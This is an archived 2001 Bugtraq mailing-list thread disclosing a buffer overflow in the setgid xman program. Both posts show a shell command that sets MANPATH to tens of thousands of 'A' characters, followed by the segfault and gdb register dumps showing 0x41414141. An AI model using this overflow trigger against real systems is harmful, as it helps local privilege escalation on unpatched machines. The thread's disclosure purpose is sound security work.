[21532] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: suid xman 3.1.6 overflows

daemon@ATHENA.MIT.EDU (Matias Sedalo)
Mon Jul 16 12:57:02 2001

Date: Mon, 16 Jul 2001 03:16:11 -0400 (ART)
From: Matias Sedalo <s0t4ipv6@shellcode.com.ar>
Cc: bugtraq@securityfocus.com
In-Reply-To: <3B4D1A61.F1681F89@snosoft.com>
Message-ID: <Pine.LNX.4.21.0107160312250.18166-100000@mother.xunil.com.ar>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0
but...\

s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
s0t4ipv6@gohan:~$ xman
Xman Error: No manual pages found.
s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
s0t4ipv6@gohan:~$ xman
Segmentation fault
s0t4ipv6@gohan:~$ uname -a 
Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown

================================================================
Matias Sedalo.______________________http://www.shellcode.com.ar/

On Wed, 11 Jul 2001, KF wrote:

> xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
> overflow 
> 
> srtxg@chanae.alphanet.ch is noted as the packager of this RPM. I do not
> know 
> the author. 
> 
> [root@linux lib]# ls -al `which xman`
> -rwxr-sr-x    1 root     man         41076 Jun 17  1998
> /usr/X11R6/bin/xman*
> 
> [root@linux lib]# xman
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
> [root@linux lib]# xman
> Xman Error: Could not allocate memory for manual sections.
> 
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
> [root@linux lib]# xman
> Segmentation fault
> 
> [root@linux lib]# gdb xman
> GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
> (gdb) run
> Starting program: /usr/X11R6/bin/xman
> 0x4022fb66 in getenv () from /lib/libc.so.6
> (gdb) bt
> #0  0x4022fb66 in getenv () from /lib/libc.so.6
> #1  0x0804bc47 in _start ()
> #2  0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
> 
> (gdb) info registers
> eax            0xbffee784       -1073813628
> ecx            0x804fb29        134544169
> edx            0x805414c        134562124
> ebx            0x40328f2c       1077055276
> esp            0xbffec6fc       0xbffec6fc
> ebp            0xbffec714       0xbffec714
> esi            0x6      6
> edi            0x41414141       1094795585
> eip            0x4022fb66       0x4022fb66
> 
> -KF
>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[21532] in bugtraq

Re: suid xman 3.1.6 overflows

daemon@ATHENA.MIT.EDU (Matias Sedalo)Mon Jul 16 12:57:02 2001

daemon@ATHENA.MIT.EDU (Matias Sedalo)
Mon Jul 16 12:57:02 2001